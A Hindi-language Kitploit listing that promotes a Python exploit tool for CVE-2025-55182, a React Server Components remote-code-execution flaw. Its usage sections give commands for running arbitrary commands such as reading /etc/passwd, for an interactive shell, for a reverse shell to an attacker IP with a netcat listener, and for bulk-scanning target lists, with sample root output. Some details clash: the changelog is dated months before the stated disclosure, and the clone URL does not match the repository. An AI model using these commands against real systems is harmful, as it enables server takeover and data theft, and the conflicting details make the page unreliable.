Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-55182_liyon — CVE-2025-55182 (React Server Components RCE) के लिए Python-आधारित शोषण, इंटरैक्टिव शेल, रिवर्स शेल, बैच स्कैनिंग और अधिकृत सुरक्षा परीक्षण के लिए Docker-आधारित कमजोर वातावरण के साथ। | Kitploit
उपकरण/GitHubGitHub/hujiaozhuzhu/cve-2025-55182_liyon
भेद्यता स्कैनरपेलोड जनरेशनशोषणशेलकोडवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंग
रिमोट एक्सेस टूल
GitHubhujiaozhuzhu/cve-2025-55182_liyon

CVE-2025-55182_liyon

CVE-2025-55182 (React Server Components RCE) के लिए Python-आधारित शोषण, इंटरैक्टिव शेल, रिवर्स शेल, बैच स्कैनिंग और अधिकृत सुरक्षा परीक्षण के लिए Docker-आधारित कमजोर वातावरण के साथ।

रिपॉजिटरी देखें
35 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-55182 - React Server Components RCE

⚠️ कानूनी घोषणा: यह उपकरण केवल सुरक्षा अनुसंधान, अधिकृत पेनिट्रेशन परीक्षण और शैक्षिक उद्देश्यों के लिए है। बिना स्पष्ट अनुमति के इस उपकरण का लक्ष्य प्रणाली पर उपयोग करना अवैध और अनैतिक है।

📋 अवलोकन

CVE-2025-55182 React Server Components (RSC) में एक महत्वपूर्ण रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता है, जो अनप्रमाणित हमलावरों को सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देता है, जो दुर्भावनापूर्ण जावास्क्रिप्ट डीसीरियलाइज़ेशन के माध्यम से होता है।

🎯 भेद्यता विवरण

गुणमान
CVE IDCVE-2025-55182
CVSS स्कोर9.8 (गंभीर)
हमला वेक्टरनेटवर्क
हमला जटिलतानिम्न
आवश्यक अनुमतियाँकोई नहीं
उपयोगकर्ता सहभागिताकोई नहीं
प्रभावउच्च (गोपनीयता, अखंडता, उपलब्धता)
प्रभावित घटकReact Server Components (RSC)
प्रभावित संस्करणReact 18.x - 19.x (विशिष्ट बिल्ड संस्करण)
प्रकटीकरण तिथि3 दिसंबर 2025
CVE उपनामReact2Shell

🔍 तकनीकी विवरण

मूल कारण: React Server Components RSC पेलोड को संसाधित करते समय उपयोगकर्ता-प्रदत्त जावास्क्रिप्ट ऑब्जेक्ट्स को अनुचित रूप से डीरियलाइज़ करता है, जिससे हमलावर सर्वर पर निष्पादित होने वाले दुर्भावनापूर्ण कोड को इंजेक्ट कर सकता है।

हमला वेक्टर: HTTP अनुरोधों में दुर्भावनापूर्ण RSC पेलोड प्रभाव: बिना प्रमाणीकरण के रिमोट कोड निष्पादन, सर्वर अधिग्रहण, डेटा लीक

🚀 विशेषताएँ

  • ✅ इंटरैक्टिव शेल के साथ एकल-फ़ाइल पायथन शोषण उपकरण
  • ✅ स्वचालित भेद्यता का पता लगाना
  • ✅ मल्टी-थ्रेडिंग के साथ बल्क स्कैनिंग
  • ✅ डॉकर-आधारित संवेदनशील React वातावरण
  • ✅ एकाधिक पेलोड प्रकारों का समर्थन
  • ✅ विस्तृत लॉगिंग और त्रुटि प्रबंधन
  • ✅ रिवर्स शेल स्थापना
  • ✅ बेस64 पेलोड एन्कोडिंग

📦 स्थापना

root@kitploit:~
# रिपॉजिटरी क्लोन करें
git clone https://github.com/hujiaozhuzhu/gju.git
cd gju

# निर्भरताएँ स्थापित करें
pip install -r requirements.txt

🎯 उपयोग

त्वरित प्रारंभ

root@kitploit:~
# निर्भरताएँ स्थापित करें
pip install requests

# संवेदनशील लक्ष्य पर कमांड निष्पादित करें
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 -c "whoami"

# इंटरैक्टिव शेल मोड
python exploit/cve_2025_55182.py -u http://127.0.0.1:3000 --shell

उन्नत विकल्प

root@kitploit:~
# कस्टम कमांड
python exploit/cve_2025_55182.py -u http://target.com -c "cat /etc/passwd"

# कस्टम IP/पोर्ट के साथ रिवर्स शेल स्थापित करें
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444

# बल्क स्कैनिंग
python exploit/batch_scanner.py -f targets.txt

# वर्बोज़ मोड
python exploit/cve_2025_55182.py -u http://target.com -v

# कस्टम User-Agent
python exploit/cve_2025_55182.py -u http://target.com --ua "Mozilla/5.0"

🏗️ लक्ष्य वातावरण सेटअप

डॉकर का उपयोग (अनुशंसित)

root@kitploit:~
cd target
docker-compose up -d

मैन्युअल सेटअप

root@kitploit:~
cd target
npm install
npm run dev

संवेदनशील एप्लिकेशन तक पहुँचें: http://localhost:3000

📊 आक्रमण परिदृश्य

परिदृश्य 1: कमांड निष्पादन

संवेदनशील सर्वर पर एकल कमांड निष्पादित करें:

root@kitploit:~
python exploit/cve_2025_55182.py -u http://target.com -c "id"

अपेक्षित आउटपुट:

root@kitploit:~
[+] भेद्यता का पता लगाया गया: React Server Components RCE
[+] कमांड निष्पादित: id
[+] प्रतिक्रिया:
uid=0(root) gid=0(root) groups=0(root)

परिदृश्य 2: इंटरैक्टिव शेल

संवेदनशील सर्वर पर इंटरैक्टिव शेल प्राप्त करें:

root@kitploit:~
python exploit/cve_2025_55182.py -u http://target.com --shell

विशेषताएँ:

  • टैब पूर्णता
  • कमांड इतिहास
  • एकाधिक शेल सत्र
  • फ़ाइल अपलोड/डाउनलोड

परिदृश्य 3: रिवर्स शेल

रिवर्स शेल कनेक्शन स्थापित करें:

root@kitploit:~
# हमलावर मशीन पर
nc -lvnp 4444

# शोषण उपकरण चलाएँ
python exploit/cve_2025_55182.py -u http://target.com --reverse 192.168.1.5:4444

परिदृश्य 4: बल्क स्कैनिंग

एकाधिक लक्ष्यों पर भेद्यता स्कैन करें:

root@kitploit:~
# लक्ष्य फ़ाइल बनाएँ
cat > targets.txt << EOF
http://192.168.1.10:3000
http://192.168.1.11:3000
http://192.168.1.12:3000
EOF

# बल्क स्कैनर चलाएँ
python exploit/batch_scanner.py -f targets.txt

🛡️ शमन और बचाव

तत्काल कार्रवाई

  1. React को अपग्रेड करें

    root@kitploit:~
    npm install react@latest
    # नवीनतम फिक्स संस्करण में अपग्रेड करें
    
  2. RSC अनुरोधों को ब्लॉक करें

    root@kitploit:~
    // अस्थायी रूप से RSC अक्षम करें
    const config = {
      enableRSC: false
    }
    
  3. WAF नियम

    • RSC पैटर्न वाले अनुरोधों को ब्लॉक करें
    • संदिग्ध जावास्क्रिप्ट पेलोड की निगरानी करें
    • RSC एंडपॉइंट पर दर सीमा लागू करें

दीर्घकालिक समाधान

  • RSC पेलोड के लिए इनपुट सत्यापन लागू करें
  • सैंडबॉक्स्ड जावास्क्रिप्ट निष्पादन का उपयोग करें
  • नियमित सुरक्षा ऑडिट
  • अनधिकृत RSC पहुँच की निगरानी करें

📚 दस्तावेज़ीकरण

  • भेद्यता विश्लेषण - तकनीकी गहन विश्लेषण
  • उपयोग गाइड - पूर्ण उपयोग निर्देश
  • बचाव और सुधार - सुरक्षा सुदृढ़ीकरण

🧪 परीक्षण

मैन्युअल परीक्षण

root@kitploit:~
# संवेदनशील वातावरण सेट करें
cd target && docker-compose up -d

# भेद्यता का परीक्षण करें
python exploit/cve_2025_55182.py -u http://localhost:3000 -c "echo 'CVE-2025-55182 RCE confirmed'"

स्वचालित परीक्षण

root@kitploit:~
# परीक्षण सूट चलाएँ
python tests/test_exploit.py

🔬 अनुसंधान संदर्भ

  • CVE-2025-55182 NVD प्रविष्टि
  • React सुरक्षा सलाह
  • Wiz अनुसंधान ब्लॉग
  • प्रोजेक्ट जीरो विश्लेषण

📝 परिवर्तन लॉग

v1.0.0 (2025-04-02)

  • प्रारंभिक रिलीज़
  • एकल-लक्ष्य RCE शोषण
  • इंटरैक्टिव शेल मोड
  • रिवर्स शेल समर्थन
  • बल्क स्कैनिंग
  • डॉकर संवेदनशील वातावरण
  • व्यापक दस्तावेज़ीकरण

🎓 शैक्षिक उद्देश्य

यह उपकरण प्रदर्शित करता है:

  • React में RCE भेद्यताएँ कैसे काम करती हैं
  • उचित भेद्यता विकास प्रथाएँ
  • सुरक्षा मूल्यांकन पद्धतियाँ
  • नैतिक हैकिंग सिद्धांत

👥 योगदानकर्ता

  • सुरक्षा शोधकर्ता - प्रारंभिक कार्यान्वयन

📄 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत है - विस्तृत जानकारी के लिए LICENSE फ़ाइल देखें।

⚠️ कानूनी और नैतिक घोषणा

महत्वपूर्ण: यह उपकरण केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए है।

कानूनी आवश्यकताएँ

  • केवल उन प्रणालियों पर उपयोग करें जिनका आप स्वामित्व रखते हैं या जिनके लिए स्पष्ट अनुमति है
  • सभी लागू कानूनों और विनियमों का पालन करें
  • विक्रेता को जिम्मेदारी से भेद्यताओं की रिपोर्ट करें
  • जिम्मेदार प्रकटीकरण दिशानिर्देशों का पालन करें

निषिद्ध गतिविधियाँ

  • अनधिकृत कंप्यूटर सिस्टम तक पहुँच
  • बिना अनुमति के सिस्टम को लक्षित करना
  • दुर्भावनापूर्ण उद्देश्यों के लिए भेद्यताओं का उपयोग
  • डेटा लीक करना या नष्ट करना

कानूनी परिणाम

  • अनधिकृत पहुँच के लिए आपराधिक आरोप
  • क्षति के लिए सिविल दायित्व
  • संभावित कारावास
  • व्यावसायिक परिणाम

इस उपकरण का उपयोग करके, आप सहमत हैं:

  • सभी स्थानीय और अंतर्राष्ट्रीय कानूनों का पालन करें
  • केवल अधिकृत सुरक्षा परीक्षण के लिए उपयोग करें
  • पाई गई भेद्यताओं की जिम्मेदारी से रिपोर्ट करें
  • दुर्भावनापूर्ण या अवैध गतिविधियों के लिए उपयोग न करें

📞 भेद्यता की रिपोर्ट करें

यदि आपको उत्पादन प्रणालियों में यह भेद्यता मिलती है:

  1. विक्रेता को रिपोर्ट करें

    • React टीम: [email protected]
    • जिम्मेदार प्रकटीकरण का पालन करें
  2. CVE आवंटन

    • NIST NVD में जमा करें
    • प्रकटीकरण समयसारिणी का पालन करें
  3. सुरक्षा समुदाय

    • निष्कर्ष साझा करें (पैच के बाद)
    • सुरक्षा ज्ञान में योगदान दें

याद रखें: सुरक्षा अनुसंधान हमेशा नैतिक और कानूनी होना चाहिए। अपने कौशल का उपयोग इंटरनेट को सुरक्षित बनाने के लिए करें! 🛡️

टूल डाउनलोड करें